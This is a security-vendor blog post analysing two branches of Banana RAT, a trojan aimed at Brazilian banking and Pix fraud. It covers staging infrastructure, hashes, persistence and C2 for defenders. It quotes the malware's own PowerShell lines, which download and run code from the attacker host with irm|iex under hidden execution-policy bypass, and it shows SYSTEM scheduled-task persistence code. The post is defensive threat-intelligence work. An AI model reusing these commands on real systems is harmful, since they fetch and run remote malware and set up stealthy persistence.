{"id":21824,"date":"2026-07-07T14:02:31","date_gmt":"2026-07-07T14:02:31","guid":{"rendered":"https:\/\/any.run\/cybersecurity-blog\/?p=21824"},"modified":"2026-07-07T14:31:04","modified_gmt":"2026-07-07T14:31:04","slug":"banana-rat-evolution-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/banana-rat-evolution-analysis\/","title":{"rendered":"Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN\u00a0"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><em><strong>Editor\u2019s note:&nbsp;The analysis is authored by Moises Cerqueira,&nbsp;<\/strong><\/em><strong><em>malware researcher &amp; threat hunter. You can&nbsp;find Moises on&nbsp;<a href=\"https:\/\/www.linkedin.com\/in\/moises-cerqueira\/\">LinkedIn<\/a>&nbsp;and&nbsp;<a href=\"https:\/\/x.com\/0x_Olympus\">X<\/a>.<\/em><\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This analysis started with an exposed public index on 198[.]245[.]53[.]26, discovered via Shodan. What made it interesting was not just the server exposure itself, but the fact that it lets us compare two different Banana RAT branches tied to the same infrastructure.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>The older detonation, analyzed on May 25, 2026, used an ETW-themed installation path and fake Microsoft naming. The newer detonation, analyzed on June 09, 2026, moved to randomized installation identifiers, VBS-assisted persistence, and WebSocket C2 over a hashed testewin.com subdomain.<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">That difference is important. Instead of seeing a single sample in isolation, we can see how the malware evolved while keeping the same staging host. This gives defenders more than a one-off IOC list: it shows how the operator changed persistence, transport, and artifact naming between two live branches.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This article focuses on three questions:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>What the older branch did on disk, in memory, and on the network.<\/li>\n\n\n\n<li>What changed in the newer branch.<\/li>\n\n\n\n<li>Which indicators remained stable across both branches.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"867\" height=\"320\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/1-Older-detonation-overview.png\" alt=\"\" class=\"wp-image-21911\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/1-Older-detonation-overview.png 867w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/1-Older-detonation-overview-300x111.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/1-Older-detonation-overview-768x283.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/1-Older-detonation-overview-370x137.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/1-Older-detonation-overview-270x100.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/1-Older-detonation-overview-740x273.png 740w\" sizes=\"auto, (max-width: 867px) 100vw, 867px\" \/><figcaption class=\"wp-element-caption\">Older detonation overview<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Why This Sample Matters<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Banana RAT is already known for targeting Brazilian financial activity, especially banking sessions and Pix-related fraud. On its own, that is not enough to justify another write-up. What makes this case worth publishing is the branch evolution visible through two detonations and one exposed server.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The public index on 198[.]245[.]53[.]26 exposed not only stage files such as st.php, st2.txt, and msedge.txt, but also operational tooling such as servidor_completo_pool.py and ofuscador.py. This was not just a payload host &#8211; it appeared to be active delivery infrastructure with variant-generation logic on the backend.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">That creates a useful story for readers:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The same staging host serves both an older and a newer branch.<\/li>\n\n\n\n<li>The operator changed artifact naming and persistence style.<\/li>\n\n\n\n<li>The newer payload still keeps a fallback path that overlaps with older infrastructure choices.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"608\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/2-Exposed-public-index-at-198.245.53.26.png\" alt=\"\" class=\"wp-image-21912\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/2-Exposed-public-index-at-198.245.53.26.png 624w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/2-Exposed-public-index-at-198.245.53.26-300x292.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/2-Exposed-public-index-at-198.245.53.26-370x361.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/2-Exposed-public-index-at-198.245.53.26-270x263.png 270w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><figcaption class=\"wp-element-caption\">Exposed public index at 198.245.53.26<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Exposed Infrastructure: Payload Generator and Obfuscator<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">servidor_completo_pool.py<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">This is a FastAPI-based service that acts as a production payload distribution backend. Its most notable characteristics are: a pool-based pre-generation of payload variants, source payloads read from \/var\/www\/html, and exposed endpoints including \/proteger, \/warmup, \/stats, and \/folders. The script includes multiple obfuscation layers with domain, path, and string transformation logic, and it explicitly protects scheduled task and registry persistence strings during transformation.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This is consistent with a live malware builder designed to generate polymorphic payload variants on demand.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">ofuscador.py<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">This helper script converts PowerShell commands into an ASCII-character reconstruction wrapper inside a BAT launcher. It converts each character to ord(), rebuilds the command using [char[]], and executes the result with iex. The output is the kind of bat-wrapped PowerShell one-liner used as an initial lure.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"662\" height=\"1024\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/3-Obfuscator-output-character-reconstruction-wrapper-662x1024.png\" alt=\"\" class=\"wp-image-21914\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/3-Obfuscator-output-character-reconstruction-wrapper-662x1024.png 662w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/3-Obfuscator-output-character-reconstruction-wrapper-194x300.png 194w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/3-Obfuscator-output-character-reconstruction-wrapper-370x572.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/3-Obfuscator-output-character-reconstruction-wrapper-270x417.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/3-Obfuscator-output-character-reconstruction-wrapper.png 703w\" sizes=\"auto, (max-width: 662px) 100vw, 662px\" \/><figcaption class=\"wp-element-caption\">Obfuscator output \/ character-reconstruction wrapper<\/figcaption><\/figure>\n<\/div>\n\n\n<h3 class=\"wp-block-heading\">Samples and Hashes<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-337\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"6\"\n           data-wpID=\"337\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:20.92574734812%;                    padding:10px;\n                    \"\n                    >\n                                        Artifact\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:25.843780135005%;                    padding:10px;\n                    \"\n                    >\n                                        Role\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:53.230472516876%;                    padding:10px;\n                    \"\n                    >\n                                        SHA256\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Fatura-BtgPactual-22568.bat\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Older detonation entry sample\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        BC4C29BC0C84EA18311FBADC508F6F3A9D84B54A456E672C2AB34D6B42F56C0C\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        msedgeupdate.txt \/ msedge.txt\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Older branch full payload\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        443C0A821C214471D74B51093AB3D69BB9BEE54DED049E5ABCDA2551E4F12707\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        st.php.malw\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Stage-2 stager (newer branch)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        E9D918FF5F7918CFF1A3A23F3945058A66B56D6DD724066414C7E1CAB95E166D\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        payload_new.php.malw\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Full PowerShell payload (newer branch)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        D828949ADE683CF3AC6D4260F946CA33EF861035051DB07D3EE79EC75DD243B2\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        c9dba5b0552d879be654.txt\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Runtime payload extracted from host\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        D828949ADE683CF3AC6D4260F946CA33EF861035051DB07D3EE79EC75DD243B2\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-337'>\ntable#wpdtSimpleTable-337{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-337 td, table.wpdtSimpleTable337 th { white-space: normal !important; }\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<p class=\"wp-block-paragraph\">The matching SHA256 between payload_new.php.malw and the extracted runtime payload closes the loop between public infrastructure, sandbox telemetry, and recovered runtime artifact.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Older Detonation: ETW-Themed Branch<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Staging and First Execution<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The older detonation analyzed Fatura-BtgPactual-22568.bat (SHA256 BC4C29BC\u2026C0C), tagged by ANY.RUN as a PowerShell-based loader. The staging chain was straightforward:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>GET http:\/\/198[.]245[.]53[.]26\/st.txt<\/li>\n\n\n\n<li>GET http:\/\/198[.]245[.]53[.]26\/payload.php<\/li>\n\n\n\n<li>The visible PowerShell one-liner used was:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell \"$po='http:\/\/198.245.53.26\/st.txt';iex(irm $po)\" <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This anchors the older branch to the same host later used by the newer branch. The difference is in the second-stage naming and the final payload behavior, not in the initial staging server.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"989\" height=\"39\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/4-Older-branch-network-requests.png\" alt=\"\" class=\"wp-image-21920\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/4-Older-branch-network-requests.png 989w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/4-Older-branch-network-requests-300x12.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/4-Older-branch-network-requests-768x30.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/4-Older-branch-network-requests-370x15.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/4-Older-branch-network-requests-270x11.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/4-Older-branch-network-requests-740x29.png 740w\" sizes=\"auto, (max-width: 989px) 100vw, 989px\" \/><figcaption class=\"wp-element-caption\">Older branch network requests<\/figcaption><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Disk Artifacts and Persistence<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The older branch used recognizable, static installation artifacts:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C:\\Users\\Public\\Documents\\msedge.txt<\/li>\n\n\n\n<li>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Diagnosis\\ETW\\msedgeupdate.txt<\/li>\n\n\n\n<li>C:\\ProgramData\\Microsoft\\Diagnosis\\ETW\\msedgeupdate.txt<\/li>\n\n\n\n<li>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Diagnosis\\ETW\\launcher.exe<\/li>\n\n\n\n<li>C:\\ProgramData\\Microsoft\\Diagnosis\\ETW\\MicrosoftEdgeUpdateCore.exe<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Additional artifacts included client.pid, client_debug.log, install.token, user_process.log, and process_7780.log. ANY.RUN behavior showed: hidden PowerShell execution, base64-encoded PowerShell, task-scheduler-backed execution, and attempts to relaunch through an -InstallService path.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">Close detection gaps <\/span>with ANY.RUN.<br>\nReduce security risk and breach impact.\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananaRAT&amp;utm_term=070726&amp;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nContact us\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p class=\"wp-block-paragraph\">Notable command lines:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\"powershell.exe\" -NoP -EP Bypass -W Hidden -c \"$env:MSEDGE_SKIP_UAC='1'; \n IEX (gc '...\\ETW\\msedgeupdate.txt' -Raw)\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>\"powershell.exe\" -ExecutionPolicy Bypass -Command \n \"&amp; (&#091;ScriptBlock]::Create((gc '...\\msedgeupdate.txt' -Raw))) \n -ScriptPath '...\\msedgeupdate.txt' -InstallService\" <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"909\" height=\"86\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/5-Older-branch-dropped-files.png\" alt=\"\" class=\"wp-image-21922\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/5-Older-branch-dropped-files.png 909w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/5-Older-branch-dropped-files-300x28.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/5-Older-branch-dropped-files-768x73.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/5-Older-branch-dropped-files-370x35.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/5-Older-branch-dropped-files-270x26.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/5-Older-branch-dropped-files-740x70.png 740w\" sizes=\"auto, (max-width: 909px) 100vw, 909px\" \/><figcaption class=\"wp-element-caption\">Older branch dropped files<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"546\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/6-MicrosoftEdgeUpdateCore.exe-configuration-1024x546.png\" alt=\"\" class=\"wp-image-21924\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/6-MicrosoftEdgeUpdateCore.exe-configuration-1024x546.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/6-MicrosoftEdgeUpdateCore.exe-configuration-300x160.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/6-MicrosoftEdgeUpdateCore.exe-configuration-768x410.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/6-MicrosoftEdgeUpdateCore.exe-configuration-370x197.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/6-MicrosoftEdgeUpdateCore.exe-configuration-270x144.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/6-MicrosoftEdgeUpdateCore.exe-configuration-740x395.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/6-MicrosoftEdgeUpdateCore.exe-configuration.png 1396w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">MicrosoftEdgeUpdateCore.exe configuration<\/figcaption><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Older Branch C2<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The older branch used a pseudo-Microsoft hostname: c.windowns-cdn.com resolving to 149[.]56[.]12[.]51, with the active connection going to 149[.]56[.]12[.]51:443 (owner: powershell.exe PID 5784). This was functional but easier to cluster once defenders noticed the typo in &#8216;windowns&#8217;.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"514\" height=\"166\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/7-Older-branch-C2-DNS-and-connection.png\" alt=\"\" class=\"wp-image-21925\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/7-Older-branch-C2-DNS-and-connection.png 514w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/7-Older-branch-C2-DNS-and-connection-300x97.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/7-Older-branch-C2-DNS-and-connection-370x119.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/7-Older-branch-C2-DNS-and-connection-270x87.png 270w\" sizes=\"auto, (max-width: 514px) 100vw, 514px\" \/><figcaption class=\"wp-element-caption\">Older branch C2 DNS and connection<\/figcaption><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">The Newer Detonation: Dynamic SvcName and WebSocket Branch<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Staging and Payload Delivery<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The newer detonation analyzed st.php.malw (SHA256 E9D918FF\u202666D). The staging pattern still pointed to 198[.]245[.]53[.]26, but the stage file changed from st.txt to st.php:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>GET http:\/\/198[.]245[.]53[.]26\/st.php<\/li>\n\n\n\n<li>GET http:\/\/198[.]245[.]53[.]26\/payload.php<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">The staging PowerShell now enforced TLS 1.2:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\"powershell.exe\" -NoP -EP Bypass -W Hidden -c \n \"&#091;Net.ServicePointManager]::SecurityProtocol=&#091;Net.SecurityProtocolType]::Tls12; \n $env:_xR='1';irm http:\/\/198.245.53.26\/st.php|iex\" <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"853\" height=\"234\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/8-Newer-detonation-overview.png\" alt=\"\" class=\"wp-image-21928\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/8-Newer-detonation-overview.png 853w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/8-Newer-detonation-overview-300x82.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/8-Newer-detonation-overview-768x211.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/8-Newer-detonation-overview-370x102.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/8-Newer-detonation-overview-270x74.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/8-Newer-detonation-overview-740x203.png 740w\" sizes=\"auto, (max-width: 853px) 100vw, 853px\" \/><figcaption class=\"wp-element-caption\">Newer detonation overview<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"850\" height=\"75\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/9-Newer-branch-dropped-files.png\" alt=\"\" class=\"wp-image-21930\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/9-Newer-branch-dropped-files.png 850w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/9-Newer-branch-dropped-files-300x26.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/9-Newer-branch-dropped-files-768x68.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/9-Newer-branch-dropped-files-370x33.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/9-Newer-branch-dropped-files-270x24.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/9-Newer-branch-dropped-files-740x65.png 740w\" sizes=\"auto, (max-width: 850px) 100vw, 850px\" \/><figcaption class=\"wp-element-caption\">Newer branch dropped files<\/figcaption><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Persistence Model<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The newer branch uses a cleaner and more flexible persistence model. Instead of fixed ETW-themed names, it builds a Microsoft-looking directory under ProgramData, writes the runtime payload there, then creates a VBS launcher at C:\\ProgramData\\Microsoft\\7c70c4282dfc72fa\\c9dba5b0552d.vbs.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The runtime payload explicitly sets:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>TaskName = SvcName<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And creates a hidden Scheduled Task running as SYSTEM:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Register-ScheduledTask -TaskName $taskName\nNew-ScheduledTaskTrigger -AtStartup\nNew-ScheduledTaskPrincipal -UserId \"SYSTEM\" -RunLevel Highest -LogonType ServiceAccount<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">In this detonation, the task name was 7c70c4282dfc72fa. If the malware is not elevated yet, it supports a fallback under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run &#8211; the sample can survive under the user context first, then migrate into a SYSTEM-level scheduled task later.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Registry writes observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>HKCU\\Software\\Microsoft\\dc98339fa461 \u2192 SvcName = 7c70c4282dfc72fa, FileName = c9dba5b0552d879be654<\/li>\n\n\n\n<li>HKCU\\Software\\Microsoft\\Windows \u2192 CU = HKCU:\\Software\\Microsoft\\dc98339fa461<\/li>\n\n\n\n<li>HKCU&#8230;\\Internet Settings\\ZoneMap \u2192 ProxyBypass=1, IntranetName=1, UNCAsIntranet=1, AutoDetect=0<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"514\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/10-Decoded-VBS-Launcher.png\" alt=\"\" class=\"wp-image-21932\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/10-Decoded-VBS-Launcher.png 979w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/10-Decoded-VBS-Launcher-300x158.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/10-Decoded-VBS-Launcher-768x403.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/10-Decoded-VBS-Launcher-370x194.png 370w, 